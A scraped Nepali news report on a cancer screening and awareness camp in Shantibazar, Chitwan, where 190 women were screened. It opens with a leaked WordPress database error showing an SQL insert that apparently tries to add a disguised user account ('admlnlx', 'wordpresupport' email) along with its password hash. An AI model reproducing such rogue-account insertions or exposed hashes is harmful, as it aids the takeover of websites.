WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2oSXBJgKkG/w5iJsAOmvdvT.7BjK0/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 01:53:16', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २५–
पूर्वी चितवनको खैरहनी नगरपालिका–१५ शान्तिबजारमा शनिबार स्तन र पाठेघरको मुखको परीक्षण तथा सचेतना कार्यक्रम गरिएको छ ।
शान्ति युवा क्लव शान्तिबजारको आयोजना, राज मेडिकल हल र गौतम मेडिकल हलको सहआयोजना तथा क्यान्सर स्क्रिनिङ क्लिनिकको प्राविधिक सहयोगमा एक दिने शिविर सम्पन्न भएको हो । शिविरमा १ सय ९० जनाले स्तन र पाठेघरको मुखको परीक्षण गराएको शान्ति युवा क्लवका सचिव धु्रवराज खनालले जानकारी दिए । परीक्षण गराएका मध्ये १ जनामा क्यान्सरको गम्भीर शंका रहेकाले पुनः परीक्षण गराउनु पर्ने भेटिएको, ३ जनामा क्यान्सर सुरु हुने अवस्था देखिएको र ४ जनामा मासु पलाएको पाईएको सचिव खनालले बताए । क्यान्सर अस्पताल भरतपुर तथा क्यान्सर स्क्रिनिङ क्लिनिकका विषेशज्ञ मन्जु शर्मा र सर्मिला न्यौपानेको टोलीले परीक्षण गरेको थियो ।
स्तन तथा पाठेघरको परीक्षण गराउन अझै पनि लाज मान्ने प्रवृती रहेकाले गाउँमै सेवा दिने उदेश्यले कार्यक्रम आयोजना गरिएको क्लवका अध्यक्ष रामशरण दाहालले बताए । परीक्षणसंगै स्तन र पाठेघरको मुखमा लाग्ने क्यान्सर, क्यान्सरबाट बच्ने उपायका बारे प्रशिक्षण समेत दिईएको थियो । स्क्रिनिङ विषेशज्ञ सर्मिला न्यौपानेले सहभागी महिलाहरुलाई प्रशिक्षण दिएकी थिईन् । सो शिविरमा खैरहनी नगरपालिका र राप्ती नगरपालिकाका विभिन्न वडाका महिलाहरुले स्वास्थ्य लाभ लिए ।